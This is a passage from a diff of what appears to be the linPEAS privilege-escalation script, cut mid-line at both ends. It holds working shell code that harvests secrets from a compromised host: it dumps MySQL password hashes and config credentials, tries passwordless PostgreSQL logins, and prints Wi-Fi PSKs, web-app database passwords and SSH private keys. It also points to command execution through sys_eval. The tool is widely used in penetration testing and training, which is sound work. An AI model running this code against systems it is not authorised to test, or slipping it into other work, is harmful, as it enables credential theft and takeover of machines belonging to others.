writable" | sed -${E} "s,.*,${SED_RED},g" + fi + done + + system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi + done +fi + +#-- SI) Mysql version +if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; then print_2title "MySQL version" mysql --version 2>/dev/null || echo_not_found "mysql" echo "" @@ -2389,280 +2403,339 @@ if echo $CHECKS | grep -q SofI; then mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi + echo "" +elif [ "$DEBUG" ]; then echo_not_found +fi - #-- SI) Mysql credentials +#-- SI) Mysql credentials +if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then print_2title "Searching mysql credentials and exec" - if [ "$PSTORAGE_MYSQL" ]; then - printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do - for f in $(find $d -name debian.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," - cat "$f" - fi - done - for f in $(find $d -name user.MYD 2>/dev/null); do - if [ -r "$f" ]; then - echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," - grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" - fi - done - for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do - if [ -r "$f" ]; then - u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) - echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - fi - done - for f in $(find $d -name my.cnf 2>/dev/null); do - if [ -r "$f" ]; then - echo "Found readable $f" - grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," - fi - done - mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") - if [ "$mysqlexec" ]; then - echo "Found $mysqlexec" - echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," + printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do + for f in $(find $d -name debian.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," + cat "$f" fi done - else echo_not_found - fi - echo "" + for f in $(find $d -name user.MYD 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," + grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" + fi + done + for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do + if [ -r "$f" ]; then + u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + fi + done + for f in $(find $d -name my.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "Found readable $f" + grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," + fi + done + mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") + if [ "$mysqlexec" ]; then + echo "Found $mysqlexec" + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," + fi + done +elif [ "$DEBUG" ]; then echo_not_found +fi +echo "" - print_2title "Analyzing MariaDB Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then echo_not_found "mariadb.cnf"; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then echo_not_found "debian.cnf"; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; +if [ "$PSTORAGE_MARIADB" ] || [ "$DEBUG" ]; then + print_2title "Analyzing MariaDB Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mariadb.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "debian.cnf"; fi; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; +fi - print_2title "Analyzing PostgreSQL Files (limit 70)" +if [ "$PSTORAGE_POSTGRESQL" ] || [ "$DEBUG" ]; then + print_2title "Analyzing PostgreSQL Files (limit 70)" echo "Version: $(warn_exec psql -V 2>/dev/null)" - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then echo_not_found "pgadmin*.db"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then echo_not_found "pg_hba.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then echo_not_found "postgresql.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then echo_not_found "pgsql.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgadmin*.db"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pg_hba.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postgresql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgsql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; +fi - #-- SI) PostgreSQL brute - if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. - #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this - print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" +#-- SI) PostgreSQL brute +if [ "$TIMEOUT" ] && [ "$(command -v psql)" ] || [ "$DEBUG" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. +#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this + print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no fi - print_2title "Analyzing Mongo Files (limit 70)" - echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)" - if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then echo_not_found "mongod*.conf"; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; - - - print_2title "Analyzing Apache Files (limit 70)" - echo "Version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" - print_3title 'PHP exec extensions' - grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null - if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"sites-enabled$\"`" ]; then echo_not_found "sites-enabled"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "sites-enabled$" | while read f; do ls -ld "$f" | sed -${E} "s,sites-enabled$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "AuthType|AuthName|AuthUserFile|ServerName|ServerAlias" | grep -Ev "#" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"000-default\.conf$\"`" ]; then echo_not_found "000-default.conf"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "000-default\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,000-default\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,AuthType|AuthName|AuthUserFile|ServerName|ServerAlias,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"php\.ini$\"`" ]; then echo_not_found "php.ini"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "php\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,php\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E allow_ | grep -Ev "^;" | sed -${E} "s,On,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Tomcat Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then echo_not_found "tomcat-users.xml"; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing FastCGI Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then echo_not_found "fastcgi_params"; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Http conf Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then echo_not_found "httpd.conf"; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Htpasswd Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then echo_not_found ".htpasswd"; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing PHP Sessions Files (limit 70)" - ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions - if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then echo_not_found "sess_*"; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - - - print_2title "Analyzing Wordpress Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then echo_not_found "wp-config.php"; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Drupal Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then echo_not_found "settings.php"; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Moodle Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then echo_not_found "config.php"; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Supervisord Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then echo_not_found "supervisord.conf"; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Cesi Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then echo_not_found "cesi.conf"; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Rsync Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then echo_not_found "rsyncd.conf"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then echo_not_found "rsyncd.secrets"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Hostapd Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then echo_not_found "hostapd.conf"; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; - - - #-- SI) Wifi conns - print_2title "Searching wifi conns file" - wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) - if [ "$wifi" ]; then - printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done - else echo_not_found - fi - echo "" - - print_2title "Analyzing Anaconda ks Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then echo_not_found "anaconda-ks.cfg"; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing VNC Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then echo_not_found ".vnc"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.vnc$,${SED_RED},"; for ff in $(find "$f" -name "passwd"); do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then echo_not_found "*vnc*.c*nf*"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then echo_not_found "*vnc*.ini"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.txt$\"`" ]; then echo_not_found "*vnc*.txt"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then echo_not_found "*vnc*.xml"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - - - print_2title "Analyzing Ldap Files (limit 70)" - echo "The password hash is from the {SSHA} to 'structural'" - if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then echo_not_found "ldap"; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" | sed -${E} "s,ldap$,${SED_RED},"; for ff in $(find "$f" -name "*.bdb"); do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; - - - print_2title "Analyzing OpenVPN Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then echo_not_found "*.ovpn"; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; - - - #-- SI) ssh files - print_2title "Searching ssl/ssh files" - if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi - sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" - hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" - hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" - - print_2title "Analyzing SSH Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then echo_not_found "id_dsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then echo_not_found "id_rsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then echo_not_found "known_hosts"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_hosts$\"`" ]; then echo_not_found "authorized_hosts"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then echo_not_found "authorized_keys"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; - - - grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," - - if [ "$TIMEOUT" ]; then - privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) - privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) - privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) - privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) - else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout - privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) + print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," + else echo_no fi - if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then - echo "" - print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," - if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} 